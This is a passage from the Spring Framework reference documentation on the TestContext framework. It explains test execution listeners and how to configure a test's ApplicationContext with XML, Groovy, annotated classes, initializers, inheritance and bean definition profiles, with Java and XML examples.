For such low\nlevel control over how the TestContext framework operates, Spring provides a\nbootstrapping strategy.\n\n`TestContextBootstrapper` defines the SPI for _bootstrapping_ the TestContext framework.\nA `TestContextBootstrapper` is used by the `TestContextManager` to load the\n`TestExecutionListener` implementations for the current test and to build the\n`TestContext` that it manages. A custom bootstrapping strategy can be configured for a\ntest class (or test class hierarchy) via `@BootstrapWith`, either directly or as a\nmeta-annotation. If a bootstrapper is not explicitly configured via `@BootstrapWith`,\neither the `DefaultTestContextBootstrapper` or the `WebTestContextBootstrapper` will be\nused, depending on the presence of `@WebAppConfiguration`.\n\nSince the `TestContextBootstrapper` SPI is likely to change in the future in order to\naccommodate new requirements, implementers are strongly encouraged not to implement this\ninterface directly but rather to extend `AbstractTestContextBootstrapper` or one of its\nconcrete subclasses instead.\n\n[[testcontext-tel-config]]\n==== TestExecutionListener configuration\n\nSpring provides the following `TestExecutionListener` implementations that are registered\nby default, exactly in this order.\n\n* `ServletTestExecutionListener`: configures Servlet API mocks for a\n `WebApplicationContext`\n* `DirtiesContextBeforeModesTestExecutionListener`: handles the `@DirtiesContext` annotation for\n _before_ modes\n* `DependencyInjectionTestExecutionListener`: provides dependency injection for the test\n instance\n* `DirtiesContextTestExecutionListener`: handles the `@DirtiesContext` annotation for\n _after_ modes\n* `TransactionalTestExecutionListener`: provides transactional test execution with\n default rollback semantics\n* `SqlScriptsTestExecutionListener`: executes SQL scripts configured via the `@Sql`\n annotation\n\n[[testcontext-tel-config-registering-tels]]\n===== Registering custom TestExecutionListeners\n\nCustom ``TestExecutionListener``s can be registered for a test class and its subclasses\nvia the `@TestExecutionListeners` annotation. See\n<<integration-testing-annotations,annotation support>> and the javadocs for\n`@TestExecutionListeners` for details and examples.\n\n[[testcontext-tel-config-automatic-discovery]]\n===== Automatic discovery of default TestExecutionListeners\n\nRegistering custom ``TestExecutionListener``s via `@TestExecutionListeners` is suitable\nfor custom listeners that are used in limited testing scenarios; however, it can become\ncumbersome if a custom listener needs to be used across a test suite. Since Spring\nFramework 4.1, this issue is addressed via support for automatic discovery of _default_\n`TestExecutionListener` implementations via the `SpringFactoriesLoader` mechanism.\n\nSpecifically, the `spring-test` module declares all core default\n``TestExecutionListener``s under the\n`org.springframework.test.context.TestExecutionListener` key in its\n`META-INF\/spring.factories` properties file. 
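Such a declaration is an ordinary properties entry; a sketch (reusing the hypothetical
listener from the earlier example) could look like this:

[source,properties,indent=0]
----
	# META-INF/spring.factories
	org.springframework.test.context.TestExecutionListener = \
		com.example.LoggingTestExecutionListener
----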
Third-party frameworks and developers can\ncontribute their own ``TestExecutionListener``s to the list of default listeners in the\nsame manner via their own `META-INF\/spring.factories` properties file.\n\n[[testcontext-tel-config-ordering]]\n===== Ordering TestExecutionListeners\n\nWhen the TestContext framework discovers default ``TestExecutionListener``s via the\naforementioned `SpringFactoriesLoader` mechanism, the instantiated listeners are sorted\nusing Spring's `AnnotationAwareOrderComparator` which honors Spring's `Ordered` interface\nand `@Order` annotation for ordering. `AbstractTestExecutionListener` and all default\n``TestExecutionListener``s provided by Spring implement `Ordered` with appropriate\nvalues. Third-party frameworks and developers should therefore make sure that their\n_default_ ``TestExecutionListener``s are registered in the proper order by implementing\n`Ordered` or declaring `@Order`. Consult the javadocs for the `getOrder()` methods of the\ncore default ``TestExecutionListener``s for details on what values are assigned to each\ncore listener.\n\n[[testcontext-tel-config-merging]]\n===== Merging TestExecutionListeners\n\nIf a custom `TestExecutionListener` is registered via `@TestExecutionListeners`, the\n_default_ listeners will not be registered. In most common testing scenarios, this\neffectively forces the developer to manually declare all default listeners in addition to\nany custom listeners. The following listing demonstrates this style of configuration.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t@TestExecutionListeners({\n\t\tMyCustomTestExecutionListener.class,\n\t\tServletTestExecutionListener.class,\n\t\tDirtiesContextBeforeModesTestExecutionListener.class,\n\t\tDependencyInjectionTestExecutionListener.class,\n\t\tDirtiesContextTestExecutionListener.class,\n\t\tTransactionalTestExecutionListener.class,\n\t\tSqlScriptsTestExecutionListener.class\n\t})\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\nThe challenge with this approach is that it requires that the developer know exactly\nwhich listeners are registered by default. Moreover, the set of default listeners can\nchange from release to release -- for example, `SqlScriptsTestExecutionListener` was\nintroduced in Spring Framework 4.1, and `DirtiesContextBeforeModesTestExecutionListener`\nwas introduced in Spring Framework 4.2. Furthermore, third-party frameworks like Spring\nSecurity register their own default ``TestExecutionListener``s via the aforementioned\n<<testcontext-tel-config-automatic-discovery, automatic discovery mechanism>>.\n\nTo avoid having to be aware of and re-declare **all** _default_ listeners, the\n`mergeMode` attribute of `@TestExecutionListeners` can be set to\n`MergeMode.MERGE_WITH_DEFAULTS`. `MERGE_WITH_DEFAULTS` indicates that locally declared\nlisteners should be merged with the default listeners. The merging algorithm ensures that\nduplicates are removed from the list and that the resulting set of merged listeners is\nsorted according to the semantics of `AnnotationAwareOrderComparator` as described in\n<<testcontext-tel-config-ordering>>. 
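As a minimal sketch, the custom listener from the previous listing could declare its
order by overriding `getOrder()` (`500` is just an illustrative value; its effect is
discussed below):

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public class MyCustomTestExecutionListener extends AbstractTestExecutionListener {

		@Override
		public int getOrder() {
			// sorted ahead of listeners with higher order values
			return 500;
		}

		// test execution callbacks omitted...
	}
----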
If a listener implements `Ordered` or is annotated\nwith `@Order` it can influence the position in which it is merged with the defaults;\notherwise, locally declared listeners will simply be appended to the list of default\nlisteners when merged.\n\nFor example, if the `MyCustomTestExecutionListener` class in the previous example\nconfigures its `order` value (for example, `500`) to be less than the order of the\n`ServletTestExecutionListener` (which happens to be `1000`), the\n`MyCustomTestExecutionListener` can then be automatically merged with the list of\ndefaults _in front of_ the `ServletTestExecutionListener`, and the previous example could\nbe replaced with the following.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t@TestExecutionListeners(\n\t\tlisteners = MyCustomTestExecutionListener.class,\n\t\tmergeMode = MERGE_WITH_DEFAULTS\n\t)\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n\n[[testcontext-ctx-management]]\n==== Context management\n\nEach `TestContext` provides context management and caching support for the test instance\nit is responsible for. Test instances do not automatically receive access to the\nconfigured `ApplicationContext`. However, if a test class implements the\n`ApplicationContextAware` interface, a reference to the `ApplicationContext` is supplied\nto the test instance. Note that `AbstractJUnit4SpringContextTests` and\n`AbstractTestNGSpringContextTests` implement `ApplicationContextAware` and therefore\nprovide access to the `ApplicationContext` automatically.\n\n.@Autowired ApplicationContext\n[TIP]\n====\nAs an alternative to implementing the `ApplicationContextAware` interface, you can\ninject the application context for your test class through the `@Autowired` annotation\non either a field or setter method. For example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration\n\tpublic class MyTest {\n\n\t\t**@Autowired**\n\t\tprivate ApplicationContext applicationContext;\n\n\t\t\/\/ class body...\n\t}\n----\n\nSimilarly, if your test is configured to load a `WebApplicationContext`, you can inject\nthe web application context into your test as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t**@WebAppConfiguration**\n\t@ContextConfiguration\n\tpublic class MyWebAppTest {\n\t\t**@Autowired**\n\t\tprivate WebApplicationContext wac;\n\n\t\t\/\/ class body...\n\t}\n----\n\nDependency injection via `@Autowired` is provided by the\n`DependencyInjectionTestExecutionListener` which is configured by default (see\n<<testcontext-fixture-di>>).\n====\n\nTest classes that use the TestContext framework do not need to extend any particular\nclass or implement a specific interface to configure their application context. Instead,\nconfiguration is achieved simply by declaring the `@ContextConfiguration` annotation at\nthe class level. If your test class does not explicitly declare application context\nresource `locations` or annotated `classes`, the configured `ContextLoader` determines\nhow to load a context from a default location or default configuration classes. 
In\naddition to context resource `locations` and annotated `classes`, an application context\ncan also be configured via application context `initializers`.\n\nThe following sections explain how to configure an `ApplicationContext` via XML\nconfiguration files, Groovy scripts, annotated classes (typically `@Configuration`\nclasses), or context initializers using Spring's `@ContextConfiguration` annotation.\nAlternatively, you can implement and configure your own custom `SmartContextLoader` for\nadvanced use cases.\n\n[[testcontext-ctx-management-xml]]\n===== Context configuration with XML resources\n\nTo load an `ApplicationContext` for your tests using XML configuration files, annotate\nyour test class with `@ContextConfiguration` and configure the `locations` attribute with\nan array that contains the resource locations of XML configuration metadata. A plain or\nrelative path -- for example `\"context.xml\"` -- will be treated as a classpath resource\nthat is relative to the package in which the test class is defined. A path starting with\na slash is treated as an absolute classpath location, for example\n`\"\/org\/example\/config.xml\"`. A path which represents a resource URL (i.e., a path\nprefixed with `classpath:`, `file:`, `http:`, etc.) will be used __as is__.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from \"\/app-config.xml\" and\n\t\/\/ \"\/test-config.xml\" in the root of the classpath\n\t**@ContextConfiguration(locations={\"\/app-config.xml\", \"\/test-config.xml\"})**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n`@ContextConfiguration` supports an alias for the `locations` attribute through the\nstandard Java `value` attribute. Thus, if you do not need to declare additional\nattributes in `@ContextConfiguration`, you can omit the declaration of the `locations`\nattribute name and declare the resource locations by using the shorthand format\ndemonstrated in the following example.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t**@ContextConfiguration({\"\/app-config.xml\", \"\/test-config.xml\"})**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\nIf you omit both the `locations` and `value` attributes from the `@ContextConfiguration`\nannotation, the TestContext framework will attempt to detect a default XML resource\nlocation. Specifically, `GenericXmlContextLoader` and `GenericXmlWebContextLoader` detect\na default location based on the name of the test class. If your class is named\n`com.example.MyTest`, `GenericXmlContextLoader` loads your application context from\n`\"classpath:com\/example\/MyTest-context.xml\"`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.example;\n\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from\n\t\/\/ \"classpath:com\/example\/MyTest-context.xml\"\n\t**@ContextConfiguration**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n[[testcontext-ctx-management-groovy]]\n===== Context configuration with Groovy scripts\n\nTo load an `ApplicationContext` for your tests using Groovy scripts that utilize the\n<<core.adoc#groovy-bean-definition-dsl,Groovy Bean Definition DSL>>, annotate your test class with\n`@ContextConfiguration` and configure the `locations` or `value` attribute with an array\nthat contains the resource locations of Groovy scripts. 
Resource lookup semantics for
Groovy scripts are the same as those described for <<testcontext-ctx-management-xml,XML
configuration files>>.


.Enabling Groovy script support
[TIP]
====
Support for using Groovy scripts to load an `ApplicationContext` in the Spring
TestContext Framework is enabled automatically if Groovy is on the classpath.
====

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@RunWith(SpringRunner.class)
	// ApplicationContext will be loaded from "/AppConfig.groovy" and
	// "/TestConfig.groovy" in the root of the classpath
	**@ContextConfiguration({"/AppConfig.groovy", "/TestConfig.groovy"})**
	public class MyTest {
		// class body...
	}
----

If you omit both the `locations` and `value` attributes from the `@ContextConfiguration`
annotation, the TestContext framework will attempt to detect a default Groovy script.
Specifically, `GenericGroovyXmlContextLoader` and `GenericGroovyXmlWebContextLoader`
detect a default location based on the name of the test class. If your class is named
`com.example.MyTest`, the Groovy context loader will load your application context from
`"classpath:com/example/MyTestContext.groovy"`.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	package com.example;

	@RunWith(SpringRunner.class)
	// ApplicationContext will be loaded from
	// "classpath:com/example/MyTestContext.groovy"
	**@ContextConfiguration**
	public class MyTest {
		// class body...
	}
----

.Declaring XML config and Groovy scripts simultaneously
[TIP]
====
Both XML configuration files and Groovy scripts can be declared simultaneously via the
`locations` or `value` attribute of `@ContextConfiguration`. If the path to a configured
resource location ends with `.xml` it will be loaded using an `XmlBeanDefinitionReader`;
otherwise it will be loaded using a `GroovyBeanDefinitionReader`.

The following listing demonstrates how to combine both in an integration test.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@RunWith(SpringRunner.class)
	// ApplicationContext will be loaded from
	// "/app-config.xml" and "/TestConfig.groovy"
	@ContextConfiguration({ "/app-config.xml", "/TestConfig.groovy" })
	public class MyTest {
		// class body...
	}
----
====

[[testcontext-ctx-management-javaconfig]]
===== Context configuration with annotated classes

To load an `ApplicationContext` for your tests using __annotated classes__ (see
<<core.adoc#beans-java, Java-based container configuration>>),
annotate your test class with `@ContextConfiguration` and configure the
`classes` attribute with an array that contains references to annotated classes.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@RunWith(SpringRunner.class)
	// ApplicationContext will be loaded from AppConfig and TestConfig
	**@ContextConfiguration(classes = {AppConfig.class, TestConfig.class})**
	public class MyTest {
		// class body...
	}
----

.Annotated Classes
[TIP]
====
The term __annotated class__ can refer to any of the following.

* A class annotated with `@Configuration`
* A component (i.e., a class annotated with `@Component`, `@Service`, `@Repository`, etc.)
* A JSR-330 compliant class that is annotated with `javax.inject` annotations
* Any other class that contains `@Bean`-methods

Consult the javadocs of `@Configuration` and `@Bean` for further information regarding
the configuration and semantics of
__annotated classes__, paying special attention to\nthe discussion of __`@Bean` Lite Mode__.\n====\n\nIf you omit the `classes` attribute from the `@ContextConfiguration` annotation, the\nTestContext framework will attempt to detect the presence of default configuration\nclasses. Specifically, `AnnotationConfigContextLoader` and\n`AnnotationConfigWebContextLoader` will detect all `static` nested classes of the test class\nthat meet the requirements for configuration class implementations as specified in the\n`@Configuration` javadocs. In the following example, the `OrderServiceTest` class\ndeclares a `static` nested configuration class named `Config` that will be automatically\nused to load the `ApplicationContext` for the test class. Note that the name of the\nconfiguration class is arbitrary. In addition, a test class can contain more than one\n`static` nested configuration class if desired.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from the\n\t\/\/ static nested Config class\n\t**@ContextConfiguration**\n\tpublic class OrderServiceTest {\n\n\t\t@Configuration\n\t\tstatic class Config {\n\n\t\t\t\/\/ this bean will be injected into the OrderServiceTest class\n\t\t\t@Bean\n\t\t\tpublic OrderService orderService() {\n\t\t\t\tOrderService orderService = new OrderServiceImpl();\n\t\t\t\t\/\/ set properties, etc.\n\t\t\t\treturn orderService;\n\t\t\t}\n\t\t}\n\n\t\t@Autowired\n\t\tprivate OrderService orderService;\n\n\t\t@Test\n\t\tpublic void testOrderService() {\n\t\t\t\/\/ test the orderService\n\t\t}\n\n\t}\n----\n\n[[testcontext-ctx-management-mixed-config]]\n===== Mixing XML, Groovy scripts, and annotated classes\n\nIt may sometimes be desirable to mix XML configuration files, Groovy scripts, and\nannotated classes (i.e., typically `@Configuration` classes) to configure an\n`ApplicationContext` for your tests. For example, if you use XML configuration in\nproduction, you may decide that you want to use `@Configuration` classes to configure\nspecific Spring-managed components for your tests, or vice versa.\n\nFurthermore, some third-party frameworks (like Spring Boot) provide first-class support\nfor loading an `ApplicationContext` from different types of resources simultaneously\n(e.g., XML configuration files, Groovy scripts, and `@Configuration` classes). The Spring\nFramework historically has not supported this for standard deployments. Consequently,\nmost of the `SmartContextLoader` implementations that the Spring Framework delivers in\nthe `spring-test` module support only one resource type per test context; however, this\ndoes not mean that you cannot use both. One exception to the general rule is that the\n`GenericGroovyXmlContextLoader` and `GenericGroovyXmlWebContextLoader` support both XML\nconfiguration files and Groovy scripts simultaneously. Furthermore, third-party\nframeworks may choose to support the declaration of both `locations` and `classes` via\n`@ContextConfiguration`, and with the standard testing support in the TestContext\nframework, you have the following options.\n\nIf you want to use resource locations (e.g., XML or Groovy) __and__ `@Configuration`\nclasses to configure your tests, you will have to pick one as the __entry point__, and\nthat one will have to include or import the other. 
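One direction is sketched below: a `@Configuration` class serving as the entry point
that imports an XML resource location (the class and resource names are illustrative,
not from the examples above):

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	// Entry point: a @Configuration class that imports XML configuration
	@Configuration
	@ImportResource("classpath:/app-config.xml")
	public class TestAppConfig {
		// additional @Bean methods...
	}
----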
For example, in XML or Groovy scripts\nyou can include `@Configuration` classes via component scanning or define them as normal\nSpring beans; whereas, in a `@Configuration` class you can use `@ImportResource` to\nimport XML configuration files or Groovy scripts. Note that this behavior is semantically\nequivalent to how you configure your application in production: in production\nconfiguration you will define either a set of XML or Groovy resource locations or a set\nof `@Configuration` classes that your production `ApplicationContext` will be loaded\nfrom, but you still have the freedom to include or import the other type of configuration.\n\n[[testcontext-ctx-management-initializers]]\n===== Context configuration with context initializers\nTo configure an `ApplicationContext` for your tests using context initializers, annotate\nyour test class with `@ContextConfiguration` and configure the `initializers` attribute\nwith an array that contains references to classes that implement\n`ApplicationContextInitializer`. The declared context initializers will then be used to\ninitialize the `ConfigurableApplicationContext` that is loaded for your tests. Note that\nthe concrete `ConfigurableApplicationContext` type supported by each declared\ninitializer must be compatible with the type of `ApplicationContext` created by the\n`SmartContextLoader` in use (i.e., typically a `GenericApplicationContext`).\nFurthermore, the order in which the initializers are invoked depends on whether they\nimplement Spring's `Ordered` interface or are annotated with Spring's `@Order` annotation\nor the standard `@Priority` annotation.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from TestConfig\n\t\/\/ and initialized by TestAppCtxInitializer\n\t**@ContextConfiguration(\n\t\tclasses = TestConfig.class,\n\t\tinitializers = TestAppCtxInitializer.class)**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\nIt is also possible to omit the declaration of XML configuration files, Groovy scripts,\nor annotated classes in `@ContextConfiguration` entirely and instead declare only\n`ApplicationContextInitializer` classes which are then responsible for registering beans\nin the context -- for example, by programmatically loading bean definitions from XML\nfiles or configuration classes.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be initialized by EntireAppInitializer\n\t\/\/ which presumably registers beans in the context\n\t**@ContextConfiguration(initializers = EntireAppInitializer.class)**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n[[testcontext-ctx-management-inheritance]]\n===== Context configuration inheritance\n`@ContextConfiguration` supports boolean `inheritLocations` and `inheritInitializers`\nattributes that denote whether resource locations or annotated classes and context\ninitializers declared by superclasses should be __inherited__. The default value for\nboth flags is `true`. This means that a test class inherits the resource locations or\nannotated classes as well as the context initializers declared by any superclasses.\nSpecifically, the resource locations or annotated classes for a test class are appended\nto the list of resource locations or annotated classes declared by superclasses.\nSimilarly, the initializers for a given test class will be added to the set of\ninitializers defined by test superclasses. 
Thus, subclasses have the option\nof __extending__ the resource locations, annotated classes, or context initializers.\n\nIf the `inheritLocations` or `inheritInitializers` attribute in `@ContextConfiguration`\nis set to `false`, the resource locations or annotated classes and the context\ninitializers, respectively, for the test class __shadow__ and effectively replace the\nconfiguration defined by superclasses.\n\nIn the following example that uses XML resource locations, the `ApplicationContext` for\n`ExtendedTest` will be loaded from __\"base-config.xml\"__ __and__\n__\"extended-config.xml\"__, in that order. Beans defined in __\"extended-config.xml\"__ may\ntherefore __override__ (i.e., replace) those defined in __\"base-config.xml\"__.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from \"\/base-config.xml\"\n\t\/\/ in the root of the classpath\n\t**@ContextConfiguration(\"\/base-config.xml\")**\n\tpublic class BaseTest {\n\t\t\/\/ class body...\n\t}\n\n\t\/\/ ApplicationContext will be loaded from \"\/base-config.xml\" and\n\t\/\/ \"\/extended-config.xml\" in the root of the classpath\n\t**@ContextConfiguration(\"\/extended-config.xml\")**\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ class body...\n\t}\n----\n\nSimilarly, in the following example that uses annotated classes, the\n`ApplicationContext` for `ExtendedTest` will be loaded from the `BaseConfig` __and__\n`ExtendedConfig` classes, in that order. Beans defined in `ExtendedConfig` may therefore\noverride (i.e., replace) those defined in `BaseConfig`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from BaseConfig\n\t**@ContextConfiguration(classes = BaseConfig.class)**\n\tpublic class BaseTest {\n\t\t\/\/ class body...\n\t}\n\n\t\/\/ ApplicationContext will be loaded from BaseConfig and ExtendedConfig\n\t**@ContextConfiguration(classes = ExtendedConfig.class)**\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ class body...\n\t}\n----\n\nIn the following example that uses context initializers, the `ApplicationContext` for\n`ExtendedTest` will be initialized using `BaseInitializer` __and__\n`ExtendedInitializer`. Note, however, that the order in which the initializers are\ninvoked depends on whether they implement Spring's `Ordered` interface or are annotated\nwith Spring's `@Order` annotation or the standard `@Priority` annotation.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be initialized by BaseInitializer\n\t**@ContextConfiguration(initializers = BaseInitializer.class)**\n\tpublic class BaseTest {\n\t\t\/\/ class body...\n\t}\n\n\t\/\/ ApplicationContext will be initialized by BaseInitializer\n\t\/\/ and ExtendedInitializer\n\t**@ContextConfiguration(initializers = ExtendedInitializer.class)**\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ class body...\n\t}\n----\n\n[[testcontext-ctx-management-env-profiles]]\n===== Context configuration with environment profiles\nSpring 3.1 introduced first-class support in the framework for the notion of\nenvironments and profiles (a.k.a., __bean definition profiles__), and integration tests\ncan be configured to activate particular bean definition profiles for various testing\nscenarios. 
This is achieved by annotating a test class with the `@ActiveProfiles`\nannotation and supplying a list of profiles that should be activated when loading the\n`ApplicationContext` for the test.\n\n[NOTE]\n====\n`@ActiveProfiles` may be used with any implementation of the new `SmartContextLoader`\nSPI, but `@ActiveProfiles` is not supported with implementations of the older\n`ContextLoader` SPI.\n====\n\nLet's take a look at some examples with XML configuration and `@Configuration` classes.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<!-- app-config.xml -->\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:jdbc=\"http:\/\/www.springframework.org\/schema\/jdbc\"\n\t\txmlns:jee=\"http:\/\/www.springframework.org\/schema\/jee\"\n\t\txsi:schemaLocation=\"...\">\n\n\t\t<bean id=\"transferService\"\n\t\t\t\tclass=\"com.bank.service.internal.DefaultTransferService\">\n\t\t\t<constructor-arg ref=\"accountRepository\"\/>\n\t\t\t<constructor-arg ref=\"feePolicy\"\/>\n\t\t<\/bean>\n\n\t\t<bean id=\"accountRepository\"\n\t\t\t\tclass=\"com.bank.repository.internal.JdbcAccountRepository\">\n\t\t\t<constructor-arg ref=\"dataSource\"\/>\n\t\t<\/bean>\n\n\t\t<bean id=\"feePolicy\"\n\t\t\tclass=\"com.bank.service.internal.ZeroFeePolicy\"\/>\n\n\t\t<beans profile=\"dev\">\n\t\t\t<jdbc:embedded-database id=\"dataSource\">\n\t\t\t\t<jdbc:script\n\t\t\t\t\tlocation=\"classpath:com\/bank\/config\/sql\/schema.sql\"\/>\n\t\t\t\t<jdbc:script\n\t\t\t\t\tlocation=\"classpath:com\/bank\/config\/sql\/test-data.sql\"\/>\n\t\t\t<\/jdbc:embedded-database>\n\t\t<\/beans>\n\n\t\t<beans profile=\"production\">\n\t\t\t<jee:jndi-lookup id=\"dataSource\" jndi-name=\"java:comp\/env\/jdbc\/datasource\"\/>\n\t\t<\/beans>\n\n\t\t<beans profile=\"default\">\n\t\t\t<jdbc:embedded-database id=\"dataSource\">\n\t\t\t\t<jdbc:script\n\t\t\t\t\tlocation=\"classpath:com\/bank\/config\/sql\/schema.sql\"\/>\n\t\t\t<\/jdbc:embedded-database>\n\t\t<\/beans>\n\n\t<\/beans>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from \"classpath:\/app-config.xml\"\n\t@ContextConfiguration(\"\/app-config.xml\")\n\t@ActiveProfiles(\"dev\")\n\tpublic class TransferServiceTest {\n\n\t\t@Autowired\n\t\tprivate TransferService transferService;\n\n\t\t@Test\n\t\tpublic void testTransferService() {\n\t\t\t\/\/ test the transferService\n\t\t}\n\t}\n----\n\nWhen `TransferServiceTest` is run, its `ApplicationContext` will be loaded from the\n`app-config.xml` configuration file in the root of the classpath. If you inspect\n`app-config.xml` you'll notice that the `accountRepository` bean has a dependency on a\n`dataSource` bean; however, `dataSource` is not defined as a top-level bean. Instead,\n`dataSource` is defined three times: in the __production__ profile, the\n__dev__ profile, and the __default__ profile.\n\nBy annotating `TransferServiceTest` with `@ActiveProfiles(\"dev\")` we instruct the Spring\nTestContext Framework to load the `ApplicationContext` with the active profiles set to\n`{\"dev\"}`. As a result, an embedded database will be created and populated with test data,\nand the `accountRepository` bean will be wired with a reference to the development\n`DataSource`. And that's likely what we want in an integration test.\n\nIt is sometimes useful to assign beans to a `default` profile. 
Beans within the default profile\nare only included when no other profile is specifically activated. This can be used to define\n_fallback_ beans to be used in the application's default state. For example, you may\nexplicitly provide a data source for `dev` and `production` profiles, but define an in-memory\ndata source as a default when neither of these is active.\n\nThe following code listings demonstrate how to implement the same configuration and\nintegration test but using `@Configuration` classes instead of XML.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@Profile(\"dev\")\n\tpublic class StandaloneDataConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\treturn new EmbeddedDatabaseBuilder()\n\t\t\t\t.setType(EmbeddedDatabaseType.HSQL)\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/schema.sql\")\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/test-data.sql\")\n\t\t\t\t.build();\n\t\t}\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@Profile(\"production\")\n\tpublic class JndiDataConfig {\n\n\t\t@Bean(destroyMethod=\"\")\n\t\tpublic DataSource dataSource() throws Exception {\n\t\t\tContext ctx = new InitialContext();\n\t\t\treturn (DataSource) ctx.lookup(\"java:comp\/env\/jdbc\/datasource\");\n\t\t}\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@Profile(\"default\")\n\tpublic class DefaultDataConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\treturn new EmbeddedDatabaseBuilder()\n\t\t\t\t.setType(EmbeddedDatabaseType.HSQL)\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/schema.sql\")\n\t\t\t\t.build();\n\t\t}\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class TransferServiceConfig {\n\n\t\t@Autowired DataSource dataSource;\n\n\t\t@Bean\n\t\tpublic TransferService transferService() {\n\t\t\treturn new DefaultTransferService(accountRepository(), feePolicy());\n\t\t}\n\n\t\t@Bean\n\t\tpublic AccountRepository accountRepository() {\n\t\t\treturn new JdbcAccountRepository(dataSource);\n\t\t}\n\n\t\t@Bean\n\t\tpublic FeePolicy feePolicy() {\n\t\t\treturn new ZeroFeePolicy();\n\t\t}\n\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration(classes = {\n\t\t\tTransferServiceConfig.class,\n\t\t\tStandaloneDataConfig.class,\n\t\t\tJndiDataConfig.class,\n\t\t\tDefaultDataConfig.class})\n\t@ActiveProfiles(\"dev\")\n\tpublic class TransferServiceTest {\n\n\t\t@Autowired\n\t\tprivate TransferService transferService;\n\n\t\t@Test\n\t\tpublic void testTransferService() {\n\t\t\t\/\/ test the transferService\n\t\t}\n\t}\n----\n\nIn this variation, we have split the XML configuration into four independent\n`@Configuration` classes:\n\n* `TransferServiceConfig`: acquires a `dataSource` via dependency injection using\n `@Autowired`\n* `StandaloneDataConfig`: defines a `dataSource` for an embedded database suitable for\n developer tests\n* `JndiDataConfig`: defines a `dataSource` that is retrieved from JNDI in a production\n environment\n* `DefaultDataConfig`: defines a `dataSource` for a default embedded database in case\n no profile is active\n\nAs with the XML-based configuration example, we still annotate `TransferServiceTest`\nwith `@ActiveProfiles(\"dev\")`, but this time we specify all four configuration classes\nvia the `@ContextConfiguration` annotation. 
